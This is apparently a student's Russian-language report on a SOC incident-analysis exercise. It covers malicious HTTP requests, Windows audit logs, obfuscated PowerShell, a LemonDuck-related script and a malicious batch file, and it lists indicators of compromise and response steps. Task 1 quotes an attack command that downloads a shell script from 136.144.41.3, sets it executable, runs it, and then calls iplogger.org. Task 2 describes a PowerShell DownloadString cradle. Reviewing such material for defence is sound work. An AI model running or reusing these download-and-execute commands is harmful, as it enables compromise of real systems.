HackMD - Collaborative Markdown Knowledge Base

## Отчет по первому интенсиву. ## 1) В файле task1.txt привёден текст HTTP-запроса. Рисунок 1 ниже. ![](https://i.imgur.com/ht34PQw.png) Рисунок 1 1. Опишите, что происходит (чего добиваются атакующие). Получают доступ к логину, далее проваливаются в cmd и выполняют следующие команды: wget+http://136.144.41.3+igipdmcdmsklcmk/%2ohsitsvegawellrip.sh+;+chmod+777+ohsitsvegawellrip.sh+;+sh+ohsitsvegawellrip.sh+;+wget+https://https:%2%2iplogger.org%22FGVP5 где, а) wget+http://136.144.41.3+igipdmcdmsklcmk/%2ohsitsvegawellrip.sh+; - скачивают с айпи 136.144.41.3 с директории igipdmcdmsklcmk файл ohsitsvegawellrip.sh б) chmod+777+ohsitsvegawellrip.sh+; - выставляют права на чтение, запись, исполнение этого файла в) sh+ohsitsvegawellrip.sh+; - запускается шелл г) wget+https://https:%2%2iplogger.org%22FGVP5; - предположительно, с помощью шелла идет обращение к iplogger и будет видно внешний айпи сервера 2. Выделите признаки, по которым понятно, что происходит атака. Пытаются получить доступ к логин панелю Выполняется шелл команда в get запросе 3. Выделите IoС'и, которые могут быть использованы для выявления подобной активности в будущем. IP 136.144.41.3 Файл ohsitsvegawellrip.sh 4. Укажите, каким образом можно удостовериться в том, удалось ли атакующим достигнуть того, чего они добивались этим запросом. Посмотреть, ответ сервера на этот запрос Посмотреть, было ли обращение к iplogger ## 2) В файле task2.md приведен скриншот события из журнала аудита Windows. Рисунок 2 ниже. ![](https://i.imgur.com/0lEwc4A.png) Рисунок 2 1. Что подозрительного в событии? Скачивает и запускает скрипт с http://tinyurl.com/y7ukpduz. Полученная команда Invoke-Expression New-Object Net.Webclient Downloadstring Invoke http://tinyurl.com/y7ukpduz. Перейдя по ссылке, увидим следующее на рисунке 3. ![](https://i.imgur.com/2c8I0ln.png) Рисунок 3 2. С какой целью реализовано? Для обхода правил СЗИ, например обход сигнатур. ## 3) В файле task3.evtx содержатся события журнала аудита Windows. 1. Что в этих событиях является подозрительным? Запуск повершелла от родительского процесса winword.exe, рисунок 4 ниже. ![](https://i.imgur.com/pyv2vuN.png) Рисунок 4 Так же запуск winword.exe был запущен от пользователя СИСТЕМА. Рисунок 5 ниже. ![](https://i.imgur.com/525ZxXh.png) Рисунок 5 2. Какие признаки указанных событий на это указывают? Запуск повершелла, от процесса winword.exe 3. Какие IoC'и можно выделить из этих событий? omni-consumer-pr0ducts.tk 4. Опишите подробно суть подозрительных действий в системе, зафиксированных в этом журнале. Пользователь запустил ворд, после чего было запущен повершелл. Рисунок 6 ниже. ![](https://i.imgur.com/1nNp62z.png) Рисунок 6 Так же был запущен winrar. Рисунок 7 ниже. ![](https://i.imgur.com/WwKQUNl.png) Рисунок 7 ![](https://i.imgur.com/SGgneQd.png) Были запущены скрипты на проверки политик. Рисунки 8 и 9 ниже. ![](https://i.imgur.com/4xhTqKg.png) Рисунок 8 ![](https://i.imgur.com/QH1Wy5q.png) Рисунок 9 Так же был запущен в бесшумном режиме powershell, в котором указывается на скачивание ico файла в обфусцированном виде. Рисунок 10 ниже. ![](https://i.imgur.com/SGgneQd.png) Рисунок 10 Получили результат, рисунок 11 ниже. ![](https://i.imgur.com/ymPvbtV.png) Рисунок 11 ## 4) В файле event.json приведено корреляционное событие на основе событий журнала аудита Windows. 1. Что произошло на узле? Из под УЗ с правами администратора (S-1-5-21-3972764045-3367587489-4173394316-500) на узле larteshina.plat.form в 13:26:22 29 августа 2022 года был запущен бесшумно take_process_data.ps1 из папки "C:\\Program Files\\administrator_check\\", после декодировки base64 получили еще обфусцированный powershell скрипт. Рисунок 10 ниже. ![](https://i.imgur.com/iNGOAJa.png) Рисунок 10 После деобфускации получили скрипт, похожий на rootkit, дальнейший анализ не увенчался успехом. Рисунок 11 ниже. ![](https://i.imgur.com/vx3gSID.png) Рисунок 11 2. С помощью чего это удалось добиться? с помощью обфускации(base64, gzip) 3. Если есть, то укажите адрес C&C и порт. не был обнаружен ## 5) В SOC одной компании обратился пользователь, обеспокоенный странными процессами Powershell, которые он обнаружил в диспетчере задач. В ходе расследования специалистам удалось получить информацию об одном из подозрительных PS-скриптов, выполнявшихся на его компьютере (см. файл command.txt) Определите: 1. К какому семейству принадлежит данное ВПО? RAT 2. Перечислите имена всех файлов, которые могли быть загружены на компьютер с помощью данного скрипта. Загружает данные внутри которых находится подпись и команды. lemonduck.bat относится к miner и evader Эти файлы могли быть загружены kyltmEahw.exe и m6.bin.exe ## 6) Некий пользователь решил скачать архив с "супер крутой игрой". Внутри лежал bat-файл, который пользователь спокойно запустил. В файле Log.txt приведена выдержка из событий журнала аудита Windows, связанных с указанными действиями. 1. Опишите, что же на самом деле произошло на компьтере пользователя. Пользователь Вася Пупкин скачал zip архив, после чего запустил l1.bat. Так же был запущен повершелл, рисунок 12 ниже. ![](https://i.imgur.com/MQpc7qT.png) Рисунок 12 Есть криптографическая функция, которая обращается на внутренний адрес с портом 4321. 2. Укажите необходимые подробности и признаки, по которым можно выявлять подобную активность. Скачивание архива, запуск скриптов, повышение привелегий. 3. Необходимые данные для осуществления мер по реагированию. Изолировать источник. Средствами АВПО проверить источник на наличие вирусов. Отправить сэмпл в отдел форензики. Убедиться, что УЗ не была скомпроментирована. Провести беседу с этим пользователем.